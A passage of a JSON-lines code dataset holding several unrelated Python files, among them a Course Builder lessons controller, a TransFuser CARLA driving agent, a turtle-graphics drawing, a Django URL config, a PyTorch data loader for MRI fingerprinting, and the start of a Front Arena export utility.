[review_step_key])[0]\n except Exception: # pylint: disable-msg=broad-except\n self.error(404)\n return\n\n # Check that the student is allowed to review this submission.\n if not student.has_same_key_as(review_step.reviewer_key):\n self.error(404)\n return\n\n self.template_value['navbar'] = {'course': True}\n self.template_value['unit_id'] = unit.unit_id\n\n # Check that the review due date has not passed.\n time_now = datetime.datetime.now()\n review_due_date = unit.workflow.get_review_due_date()\n if time_now > review_due_date:\n self.template_value['time_now'] = time_now.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n self.template_value['review_due_date'] = (\n review_due_date.strftime(HUMAN_READABLE_DATETIME_FORMAT))\n self.template_value['error_code'] = 'review_deadline_exceeded'\n self.render('error.html')\n return\n\n mark_completed = (self.request.get('is_draft') == 'false')\n self.template_value['is_draft'] = (not mark_completed)\n\n review_payload = self.request.get('answers')\n review_payload = transforms.loads(\n review_payload) if review_payload else []\n try:\n rp.write_review(\n unit.unit_id, review_step_key, review_payload, mark_completed)\n course.update_final_grades(student)\n except domain.TransitionError:\n self.template_value['error_code'] = 'review_already_submitted'\n self.render('error.html')\n return\n\n self.render('review_confirmation.html')\n\n\nclass EventsRESTHandler(BaseRESTHandler):\n \"\"\"Provides REST API for an Event.\"\"\"\n\n def get(self):\n \"\"\"Returns a 404 error; this handler should not be GET-accessible.\"\"\"\n self.error(404)\n return\n\n def _add_location_facts(self, payload_json):\n payload_dict = transforms.loads(payload_json)\n if 'loc' not in payload_dict:\n payload_dict['loc'] = {}\n loc = payload_dict['loc']\n loc['locale'] = self.get_locale_for(self.request, self.app_context)\n loc['language'] = self.request.headers.get('Accept-Language')\n loc['country'] = self.request.headers.get('X-AppEngine-Country')\n loc['region'] = self.request.headers.get('X-AppEngine-Region')\n loc['city'] = self.request.headers.get('X-AppEngine-City')\n lat_long = self.request.headers.get('X-AppEngine-CityLatLong')\n if lat_long:\n latitude, longitude = lat_long.split(',')\n loc['lat'] = float(latitude)\n loc['long'] = float(longitude)\n payload_json = transforms.dumps(payload_dict).lstrip(\n models.transforms.JSON_XSSI_PREFIX)\n return payload_json\n\n def post(self):\n \"\"\"Receives event and puts it into datastore.\"\"\"\n\n COURSE_EVENTS_RECEIVED.inc()\n can = (\n CAN_PERSIST_ACTIVITY_EVENTS.value or\n CAN_PERSIST_PAGE_EVENTS.value or\n CAN_PERSIST_TAG_EVENTS.value)\n if not can:\n return\n\n request = transforms.loads(self.request.get('request'))\n if not self.assert_xsrf_token_or_fail(request, 'event-post', {}):\n return\n\n user = self.get_user()\n if not user:\n return\n\n source = request.get('source')\n payload_json = request.get('payload')\n payload_json = self._add_location_facts(payload_json)\n models.EventEntity.record(source, user, payload_json)\n COURSE_EVENTS_RECORDED.inc()\n\n self.process_event(user, source, payload_json)\n\n def process_event(self, user, source, payload_json):\n \"\"\"Processes an event after it has been recorded in the event stream.\"\"\"\n\n student = models.Student.get_enrolled_student_by_email(user.email())\n if not student:\n return\n\n payload = transforms.loads(payload_json)\n\n if 'location' not in payload:\n return\n\n source_url = payload['location']\n\n if source in TAGS_THAT_TRIGGER_BLOCK_COMPLETION:\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n if unit_id is not None and lesson_id is not None:\n self.get_course().get_progress_tracker().put_block_completed(\n student, unit_id, lesson_id, payload['index'])\n elif source in TAGS_THAT_TRIGGER_COMPONENT_COMPLETION:\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n cpt_id = payload['instanceid']\n if (unit_id is not None and lesson_id is not None and\n cpt_id is not None):\n self.get_course().get_progress_tracker(\n ).put_component_completed(\n student, unit_id, lesson_id, cpt_id)\n elif source in TAGS_THAT_TRIGGER_HTML_COMPLETION:\n # Records progress for scored lessons.\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n course = self.get_course()\n unit = course.find_unit_by_id(unit_id)\n lesson = course.find_lesson_by_id(unit, lesson_id)\n if (unit_id is not None and\n lesson_id is not None and\n not lesson.manual_progress):\n self.get_course().get_progress_tracker().put_html_completed(\n student, unit_id, lesson_id)\n","sub_path":"appengine/controllers/lessons.py","file_name":"lessons.py","file_ext":"py","file_size_in_byte":53680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"230107051","text":"import os\nimport json\nimport datetime\nimport pathlib\nimport time\nimport cv2\nimport carla\nfrom collections import deque\n\nimport torch\nimport carla\nimport numpy as np\nfrom PIL import Image\n\nfrom leaderboard.autoagents import autonomous_agent\nfrom transfuser.model import TransFuser\nfrom transfuser.config import GlobalConfig\nfrom transfuser.data import scale_and_crop_image, lidar_to_histogram_features, transform_2d_points\nfrom team_code.planner import RoutePlanner\n\nimport math\nfrom matplotlib import cm\nfrom copy import deepcopy\n\n\nSAVE_PATH = None#os.environ.get('SAVE_PATH', None)\n\n\ndef get_entry_point():\n return 'TransFuserAgent'\n\n\nclass TransFuserAgent(autonomous_agent.AutonomousAgent):\n def setup(self, path_to_conf_file):\n self.lidar_processed = list()\n self.track = autonomous_agent.Track.SENSORS\n self.config_path = path_to_conf_file\n self.step = -1\n self.wall_start = time.time()\n self.initialized = False\n \n self.stuck_detector = 0\n self.forced_move = 0\n self.dilation = 10 # Dilation that was applied when collecting the data.\n self.lidar_saftey = []\n\n self.input_buffer = {'rgb': deque(), 'rgb_left': deque(), 'rgb_right': deque(), \n 'rgb_rear': deque(), 'lidar': deque(), 'gps': deque(), 'thetas': deque(), 'velocity': deque()}\n\n self.config = GlobalConfig()\n self.net = TransFuser(self.config, 'cuda')\n self.net.load_state_dict(torch.load(os.path.join(path_to_conf_file, 'best_model.pth')))\n self.net.cuda()\n self.net.eval()\n\n self.save_path = None\n if SAVE_PATH is not None:\n now = datetime.datetime.now()\n string = pathlib.Path(os.environ['ROUTES']).stem + '_'\n string += '_'.join(map(lambda x: '%02d' % x, (now.month, now.day, now.hour, now.minute, now.second)))\n\n print (string)\n\n self.save_path = pathlib.Path(os.environ['SAVE_PATH']) / string\n self.save_path.mkdir(parents=True, exist_ok=False)\n\n (self.save_path / 'rgb').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'lidar_0').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'lidar_1').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'meta').mkdir(parents=True, exist_ok=False)\n\n def _init(self):\n self._route_planner = RoutePlanner(4.0, 50.0)\n self._route_planner.set_route(self._global_plan, True)\n\n self.initialized = True\n\n def _get_position(self, tick_data):\n gps = tick_data['gps']\n gps = (gps - self._route_planner.mean) * self._route_planner.scale\n\n return gps\n\n def sensors(self):\n return [\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -60.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_left'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 60.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_right'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': -1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -180.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_rear'\n },\n { \n 'type': 'sensor.lidar.ray_cast',\n 'x': 1.3, 'y': 0.0, 'z': 2.5,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -90.0,\n 'id': 'lidar'\n },\n {\n 'type': 'sensor.other.imu',\n 'x': 0.0, 'y': 0.0, 'z': 0.0,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'sensor_tick': 0.05,\n 'id': 'imu'\n },\n {\n 'type': 'sensor.other.gnss',\n 'x': 0.0, 'y': 0.0, 'z': 0.0,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'sensor_tick': 0.01,\n 'id': 'gps'\n },\n {\n 'type': 'sensor.speedometer',\n 'reading_frequency': 20,\n 'id': 'speed'\n }\n ]\n \n def tick(self, input_data):\n self.step += 1\n\n rgb = cv2.cvtColor(input_data['rgb'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_left = cv2.cvtColor(input_data['rgb_left'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_right = cv2.cvtColor(input_data['rgb_right'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_rear = cv2.cvtColor(input_data['rgb_rear'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n gps = input_data['gps'][1][:2]\n speed = input_data['speed'][1]['speed']\n compass = input_data['imu'][1][-1]\n if (math.isnan(compass) == True): #It can happen that the compass sends nan for a few frames\n compass = 0.0\n lidar = input_data['lidar'][1][:, :3]\n\n result = {\n 'rgb': rgb,\n 'rgb_left': rgb_left,\n 'rgb_right': rgb_right,\n 'rgb_rear': rgb_rear,\n 'lidar': lidar,\n 'gps': gps,\n 'speed': speed,\n 'compass': compass,\n }\n \n pos = self._get_position(result)\n result['gps'] = pos\n next_wp, next_cmd = self._route_planner.run_step(pos)\n result['next_command'] = next_cmd.value\n\n theta = compass + np.pi/2\n R = np.array([\n [np.cos(theta), -np.sin(theta)],\n [np.sin(theta), np.cos(theta)]\n ])\n\n local_command_point = np.array([next_wp[0]-pos[0], next_wp[1]-pos[1]])\n local_command_point = R.T.dot(local_command_point)\n result['target_point'] = tuple(local_command_point)\n\n return result\n\n @torch.no_grad()\n def run_step(self, input_data, timestamp):\n if not self.initialized:\n self._init()\n\n tick_data = self.tick(input_data)\n\n if self.step < (self.config.seq_len * self.dilation):\n rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))\n \n if not self.config.ignore_sides:\n rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))\n \n rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_rear:\n rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))\n\n self.input_buffer['lidar'].append(tick_data['lidar'])\n self.input_buffer['gps'].append(tick_data['gps'])\n self.input_buffer['thetas'].append(tick_data['compass'])\n self.input_buffer['velocity'].append(torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32))\n\n control = carla.VehicleControl()\n control.steer = 0.0\n control.throttle = 0.0\n control.brake = 0.0\n \n return control\n\n command = torch.FloatTensor([tick_data['next_command']]).to('cuda', dtype=torch.float32)\n\n tick_data['target_point'] = [torch.FloatTensor([tick_data['target_point'][0]]),\n torch.FloatTensor([tick_data['target_point'][1]])]\n target_point = torch.stack(tick_data['target_point'], dim=1).to('cuda', dtype=torch.float32)\n\n encoding = []\n rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb'].popleft()\n self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_sides:\n rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_left'].popleft()\n self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))\n \n rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_right'].popleft()\n self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_rear:\n rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_rear'].popleft()\n self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))\n\n self.input_buffer['lidar'].popleft()\n self.input_buffer['lidar'].append(tick_data['lidar'])\n self.input_buffer['gps'].popleft()\n self.input_buffer['gps'].append(tick_data['gps'])\n self.input_buffer['thetas'].popleft()\n self.input_buffer['thetas'].append(tick_data['compass'])\n self.input_buffer['velocity'].popleft()\n self.input_buffer['velocity'].append(torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32))\n\n # transform the lidar point clouds to local coordinate frame\n ego_theta = self.input_buffer['thetas'][-1]\n ego_x, ego_y = self.input_buffer['gps'][-1]\n\n \n\n #Only predict every second step because we only get a front LiDAR every second frame.\n if(self.step % 2 == 0):\n # Check safety area\n # Defines a cube in front of the car that acts as safety area.\n lidar_saftey = deepcopy(tick_data['lidar'])\n lidar_saftey[:, 1] *= -1 # inverts x, y\n lidar_saftey = lidar_saftey[lidar_saftey[..., 2] > -2.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 2] < -1.05] # 0.98\n lidar_saftey = lidar_saftey[lidar_saftey[..., 1] > -3.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 1] < 0.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 0] > -1.066]\n self.lidar_saftey = lidar_saftey[lidar_saftey[..., 0] < 1.066]\n \n indices = []\n # The past 3 frames dilated by 10\n for i in range(self.config.seq_len):\n indices.append(i * self.dilation + (self.dilation - 1))\n \n self.lidar_processed = []\n for i, lidar_point_cloud_reference in enumerate(self.input_buffer['lidar']):\n # We only process the lidars that we actually need. Reduces the time of this for loop from 100ms to 15ms with seq_len = 3\n if(not (i in indices)):\n self.lidar_processed.append([])\n continue\n # We will flip the y axis of the data. To avoid doing it multiple times on the same data we need to copy it.\n lidar_point_cloud = deepcopy(lidar_point_cloud_reference) \n \n curr_theta = self.input_buffer['thetas'][i]\n curr_x, curr_y = self.input_buffer['gps'][i]\n \n lidar_point_cloud[:, 1] *= -1 # inverts x, y\n \n # Voxelize to BEV for NN to process\n \n lidar_transformed = transform_2d_points(lidar_point_cloud, np.pi / 2 - curr_theta, -curr_x, -curr_y, #500mu\n np.pi / 2 - ego_theta, -ego_x, -ego_y)\n \n \n lidar_transformed = torch.from_numpy(\n lidar_to_histogram_features(lidar_transformed, crop=self.config.input_resolution)).unsqueeze(0) #3ms\n \n self.lidar_processed.append(lidar_transformed.to('cuda', dtype=torch.float32))\n \n input_images = [self.input_buffer['rgb'][i] for i in indices]\n if not self.config.ignore_sides:\n input_images += [self.input_buffer['rgb_left'][i] for i in indices]\n input_images += [self.input_buffer['rgb_right'][i] for i in indices]\n if not self.config.ignore_rear:\n input_images += [self.input_buffer['rgb_rear'][i] for i in indices]\n input_lidars = [self.lidar_processed[i] for i in indices]\n input_velocities = [self.input_buffer['velocity'][i] for i in indices] # Used when we use seq_len velocity values\n #input_velocities = self.input_buffer['velocity'][indices[-1]] #Used when we only use 1 velocity value\n \n #Debug input data.\n #for idx, elem in enumerate(input_lidars):\n # Image.fromarray(cm.gist_earth(elem.cpu().numpy()[0, 1], bytes=True)).save(self.save_path / 'lidar_1' / (('%04d_' % self.step) + ('%04d.png' % idx)))\n #for idx, elem in enumerate(input_images):\n # elem = np.transpose(elem.cpu().numpy()[0], (1,2,0)).astype(np.uint8)\n # Image.fromarray(elem).save(self.save_path / 'rgb' / (('%04d_' % self.step) + ('%04d.png' % idx)))\n \n self.pred_wp, _, _ = self.net(input_images, input_lidars, target_point, input_velocities)\n\n is_stuck = False\n if(self.stuck_detector > 900 and self.forced_move < 30): # 900 = 45 seconds * 20 Frames per second, we move for 1.5 second = 30 frames to unblock\n print(\"Detected agent being stuck. Move for frame: \", self.forced_move)\n is_stuck = True\n self.forced_move += 1\n \n gt_velocity = self.input_buffer['velocity'][-1]\n steer, throttle, brake, metadata = self.net.control_pid(self.pred_wp, gt_velocity, is_stuck)\n self.pid_metadata = metadata\n\n if brake < 0.05: brake = 0.0\n if throttle > brake: brake = 0.0\n\n if(gt_velocity < 0.1):\n self.stuck_detector += 1\n elif(gt_velocity > 0.1 and is_stuck == False):\n self.stuck_detector = 0\n self.forced_move = 0\n\n # Safety controller. Stops the car in case something is directly in front of it.\n control = carla.VehicleControl()\n emergency_stop = (len(self.lidar_saftey) > 0) #Checks if the List is empty\n if(emergency_stop):\n print(\"Detected object directly in front of the vehicle. Stopping. Step:\", self.step)\n control.steer = float(steer)\n control.throttle = float(0.0)\n control.brake = float(True)\n #Will also overwrite the stuck detector. If we are stuck in traffic we do want to wait it out.\n else:\n control.steer = float(steer)\n control.throttle = float(throttle)\n control.brake = float(brake)\n\n # if SAVE_PATH is not None and self.step % self.dilation == 0:\n # self.save(tick_data)\n\n return control\n\n def save(self, tick_data):\n frame = self.step // self.dilation\n\n Image.fromarray(tick_data['rgb']).save(self.save_path / 'rgb' / ('%04d.png' % frame))\n\n Image.fromarray(cm.gist_earth(self.lidar_processed[0].cpu().numpy()[0, 0], bytes=True)).save(self.save_path / 'lidar_0' / ('%04d.png' % frame))\n Image.fromarray(cm.gist_earth(self.lidar_processed[0].cpu().numpy()[0, 1], bytes=True)).save(self.save_path / 'lidar_1' / ('%04d.png' % frame))\n\n\n outfile = open(self.save_path / 'meta' / ('%04d.json' % frame), 'w')\n json.dump(self.pid_metadata, outfile, indent=4)\n outfile.close()\n\n def destroy(self):\n del self.net\n\n","sub_path":"leaderboard/team_code/transfuser_agent.py","file_name":"transfuser_agent.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128893523","text":"'''This program was written by William Michael McIntosh\n\nIt will command a turtle to draw a picture of space with planets.\nI used randomized locations, sizes, and colors, yet kept planet shading.\nRuntime is approximately 60 seconds.\nDate Created: 1/15/2019'''\n\nimport turtle as t\nimport random\n\nt.setup(1280, 800)\nt.bgcolor(\"black\") # < Using the color string \"black\"\nt.setworldcoordinates(0,0,1200,700)\n\nt.pensize(3) #Pen Size\nt.hideturtle()\nt.penup()\n\nstarcount = 1\nwhile (starcount < 80):\n\n # Speed up for stars\n t.speed(1000)\n\n # Choose random position\n xpos = random.randint(20,1150)\n ypos = random.randint(20,750)\n t.goto(xpos,ypos)\n\n # White color\n t.color(1.0,1.0,1.0)\n\n # Choose Random Star Size\n starsize = random.randint(2,14)\n\n # Create Star\n drawstar = 0\n while (drawstar < 5):\n t.pendown()\n t.right(144)\n t.forward(starsize)\n t.penup()\n drawstar = drawstar + 1\n\n # Increment starcount\n starcount = starcount + 1\n\nplanetcount = 1\nwhile (planetcount < 12):\n\n # Slow down for planets\n t.speed(50)\n\n # Choose random position\n xpos = random.randint(20,1150)\n ypos = random.randint(20,750)\n t.goto(xpos,ypos)\n\n # Choose random color\n rcolor = random.randint(4,8)\n gcolor = random.randint(4,8)\n bcolor = random.randint(4,8)\n rcolor = rcolor / 10\n gcolor = gcolor / 10\n bcolor = bcolor / 10\n t.color(rcolor,gcolor,bcolor)\n\n # Choose random planet size\n planet_size = random.randint(20,100)\n\n # Create planet\n t.begin_fill()\n t.circle(planet_size)\n t.end_fill()\n\n # Set shade color\n rcolor = rcolor - .2\n gcolor = gcolor - .2\n bcolor = bcolor - .2\n t.color(rcolor,gcolor,bcolor)\n\n # Draw shade\n t.begin_fill()\n t.circle(planet_size, 100)\n t.end_fill()\n\n # Move turtle to point along circumference\n t.circle(planet_size, 80)\n\n # Set light color\n rcolor = rcolor + .4\n gcolor = gcolor + .4\n bcolor = bcolor + .4\n t.color(rcolor,gcolor,bcolor)\n\n # Draw light\n t.begin_fill()\n t.circle(planet_size, 100)\n t.end_fill()\n\n # Reset Turtle Position\n t.goto(1,1)\n t.setheading(0)\n\n # Increment planetcount\n planetcount = planetcount + 1\n\n# Choose random position\nxpos = random.randint(200,1000)\nypos = random.randint(200,600)\nt.goto(xpos,ypos)\n\n\n# Lime Green UFO Dome\nt.color(\"#00FF00\")\nt.begin_fill()\nt.circle(50)\nt.end_fill()\n\n# Light Blue UFO Body\nt.setheading(0)\nt.forward(155)\nt.left(130)\nt.color(\"#ADD8E6\")\nt.begin_fill()\nt.circle(200,100)\nt.end_fill()\nt.setheading(90)\nt.forward(15)\nt.right(90)\n\n# Pink UFO Lights\npink_lights = 0\nwhile pink_lights < 5:\n t.forward(50)\n t.color(\"Pink\")\n t.begin_fill()\n t.circle(10)\n t.end_fill()\n pink_lights = pink_lights + 1\n","sub_path":"Will_McIntosh_Shapes_Assignment2.py","file_name":"Will_McIntosh_Shapes_Assignment2.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442934142","text":"# Tic-tac-Toe \n# javascript\n# 2011 Eric Schug\n# \nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n\nurlpatterns = patterns('',\n # board\n (r'^$', 'ecstictactoe.tictactoe.views.gameView'),\n # move (ajax)\n (r'^move/$', 'ecstictactoe.tictactoe.views.getmove'),\n (r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n\n)\n","sub_path":"ecstictactoe/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"533548184","text":"\n\nfrom torch.autograd import Variable\nimport numpy as np\nimport os\nimport torch\n\nimport mf_utils as util\n\nnum_fasc = 2\n\nuse_pretrained = False\nuse_GPU = False\n\nsum_to_one = False\nremove_mean = True\nunit_variance = True\ncenter_target = True\nSNR_dist = 'uniform' # 'uniform' or 'triangular'\nnormalisation = False\n\nnum_epochs = 5\nbatch_size = 200\nmyseed = 141414\n\ntarget_names = ['nu1', 'r1 ', 'f1 ', 'nu2', 'r2 ', 'f2 ']\nnum_var = len(target_names)\n\nassert unit_variance != sum_to_one, (\"Choose one of two normalization \"\n \"strategies: either unit sum or unit \"\n \"variance.\")\n\n#Test \nif SNR_dist == 'uniform':\n nnls_output = util.loadmat('data_TEST3_article/training_data_fixedSNR_15000_samples_lou_TEST3_article')\n validation_data = nnls_output\n print(nnls_output['nnz_hist_0'])\n\n# Substrate (=fingerprint) properties\nsub_rads = nnls_output['subinfo']['rad'] # Python list\nsub_fins = nnls_output['subinfo']['fin'] # Python list\ntot_samples = nnls_output['num_samples']\n\n#%% For normalization of target outputs\n\nif normalisation:\n rad_min = np.min(nnls_output['subinfo']['rad'])\n rad_range = np.max(nnls_output['subinfo']['rad']) - rad_min\n print(rad_range)\n fin_min = np.min(nnls_output['subinfo']['fin'])\n fin_range = np.max(nnls_output['subinfo']['fin']) - fin_min\n nu_min = nnls_output['nu_min']\n nu_range = nnls_output['nu_max'] - nu_min\n trgt_true_min = np.array([nu_min, rad_min, fin_min,\n nu_min, rad_min, fin_min])\n trgt_true_range = np.array([nu_range, rad_range, fin_range,\n nu_range, rad_range, fin_range])\n if center_target:\n # Ultimately, we should map each variable to [-sqrt(3), sqrt(3)] to ensure\n # unit variance of the output\n trgt_proj_min = np.array([-nu_range/2, -0.5, -fin_range/2,\n -nu_range/2, -0.5, -fin_range/2])\n trgt_proj_range = np.array([nu_range, 1, fin_range,\n nu_range, 1, fin_range])\n else:\n # Initially, we let nu and fin take their \"natural\" values and mapped rad\n # to [0,1]\n trgt_proj_min = np.array([nu_min, 0, fin_min,\n nu_min, 0, fin_min])\n trgt_proj_range = np.array([nu_range, 1, fin_range,\n nu_range, 1, fin_range])\n \n \n\n#%% Function\n\ndef gen_batch_data(start, end, mode):\n print(mode)\n if end > tot_samples:\n raise ValueError(\"Only %d data samples available. Asked for samples \"\n \"up to %d.\" % (tot_samples, end))\n batch_size = end-start\n\n if mode == 'train':\n print('avec est ori')\n if nnls_output['sparse']:\n w_store = np.zeros((batch_size,\n nnls_output['num_fasc'] *\n nnls_output['num_atoms']))\n isbatch = ((nnls_output['w_idx'][:, 0] >= start) &\n (nnls_output['w_idx'][:, 0] < end))\n chk = (np.sum(isbatch) ==\n np.sum(nnls_output['nnz_hist'][start:end]))\n assert chk, (\"Mismatch non-zero elements in samples \"\n \"%d (incl.) to %d (excl.)\" % (start, end))\n w_idx = nnls_output['w_idx'][isbatch, :]\n w_store[w_idx[:, 0] - start,\n w_idx[:, 1]] = nnls_output['w_data'][isbatch]\n else:\n w_store = nnls_output['w_store'][start:end, :]\n \n elif mode == 'TrueOri':\n print('avec true ori')\n if nnls_output['sparse']:\n print('sparse')\n w_store = np.zeros((batch_size,\n nnls_output['num_fasc'] *\n nnls_output['num_atoms']))\n isbatch = ((nnls_output['w_idx_0'][:, 0] >= start) &\n (nnls_output['w_idx_0'][:, 0] < end))\n chk = (np.sum(isbatch) ==\n np.sum(nnls_output['nnz_hist_0'][start:end]))\n assert chk, (\"Mismatch non-zero elements in samples \"\n \"%d (incl.) to %d (excl.)\" % (start, end))\n w_idx = nnls_output['w_idx_0'][isbatch, :]\n w_store[w_idx[:, 0] - start,\n w_idx[:, 1]] = nnls_output['w_data_0'][isbatch]\n else:\n w_store = nnls_output['w_store_0'][start:end, :]\n\n #else:\n #raise ValueError('Unknown mode %s' % mode\n \n # NNLS weights no more normalized to sum to 1 after April 26, 2019.\n if sum_to_one:\n # Must be done before mean is removed!\n w_store = w_store/np.sum(w_store, axis=1)[:, np.newaxis]\n\n if remove_mean:\n w_store = w_store - np.mean(w_store, axis=1)[:, np.newaxis]\n\n if unit_variance:\n std_w = np.std(w_store, axis=1)\n idx_pos_std = np.where(std_w > 0)[0]\n w_store[idx_pos_std, :] = (w_store[idx_pos_std, :] /\n std_w[idx_pos_std][:, np.newaxis])\n # Zero variance (constant weights): normalize if non-zero weights\n # Case which should not occur too often: w_store[i, j] = C > 0 for all\n # j in [0, num_fasc*num_atoms]\n w_L1 = np.sum(np.abs(w_store), axis=1) # (Nbatch,)\n idx_pos_const = np.where((std_w == 0) & (w_L1 > 0))[0]\n if idx_pos_const.size > 0:\n w_store[idx_pos_const, :] = (w_store[idx_pos_const, :] /\n w_L1[idx_pos_const][:, np.newaxis])\n print(\"%d samples containing identical positive weights for \"\n \"all the atoms of the dictionary!\" % idx_pos_const.size)\n\n # Data contains w12 normalized to sum to one\n data = torch.from_numpy(w_store).float()\n\n # Target contains nu1, r1, f1, nu2, r2, f2\n batch_IDs = nnls_output['IDs'][start:end, :]\n batch_nus = nnls_output['nus'][start:end, :]\n\n \n #Normalisation ou pas\n target = torch.FloatTensor(batch_size, num_fasc * (1 + 2)).zero_()\n if normalisation == True:\n target[:, [0, 3]] = (trgt_proj_min[0] +\n trgt_proj_range[0] *\n (torch.from_numpy(batch_nus).float() -\n trgt_true_min[0]) /\n trgt_true_range[0])\n target[:, [1, 4]] = (trgt_proj_min[1] +\n trgt_proj_range[1] *\n (torch.FloatTensor(sub_rads)[batch_IDs] -\n trgt_true_min[1]) /\n trgt_true_range[1])\n target[:, [2, 5]] = (trgt_proj_min[2] +\n trgt_proj_range[2] *\n (torch.FloatTensor(sub_fins)[batch_IDs] -\n trgt_true_min[2]) /\n trgt_true_range[2])\n elif normalisation == False:\n target[:, [0, 3]] = torch.from_numpy(batch_nus).float()\n target[:, [1, 4]] = torch.FloatTensor(sub_rads)[batch_IDs]\n target[:, [2, 5]] = torch.FloatTensor(sub_fins)[batch_IDs]\n \n if use_GPU and torch.cuda.is_available():\n data = data.cuda()\n target = target.cuda()\n return Variable(data), Variable(target)","sub_path":"getDataW.py","file_name":"getDataW.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"285543677","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/BDExport/./etc/FExportUtils.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FExportUtils\n\n (c) Copyright 2018 FIS FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n A collection of helper classes and functions for export base.\n See ExportBaseReadMe.py for more information about this module\n\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport acm\nimport FAssetManagementUtils\nimport FStateChartUtils\nimport FLogger\nlogger = FLogger.FLogger.GetLogger(\"BD Export\")\n\ndef StandardExportEventId():\n return 'Export Executed'\n\ndef CreateStateChart(name, definition, layout=None, limit='Unlimited'):\n \"\"\"Creates a state chart with the given name, if required.\n\n The definition parameter must completely define the content of the business\n process state chart, including all states and transitions between them. Its\n format is a dictionary of states mapped to a dictionary of transitions as\n event->next_state items, e.g.:\n\n {'state a': {'event to go to b': 'state b', 'event to go to c': 'state c'}}\n\n All defined next_states values must be unique within a state's transitions\n (i.e. multiple events cannot lead to the same next_state).\n\n \"\"\"\n sc = acm.FStateChart[name]\n if sc:\n return sc\n\n sc = acm.FStateChart(name=name)\n sc.BusinessProcessesPerSubject(limit)\n\n # Create all states, including those referenced in transitions\n state_names = definition.keys()\n for all_transitions in definition.values():\n state_names.extend([s for s in all_transitions.values() if s not in state_names])\n\n for state_name 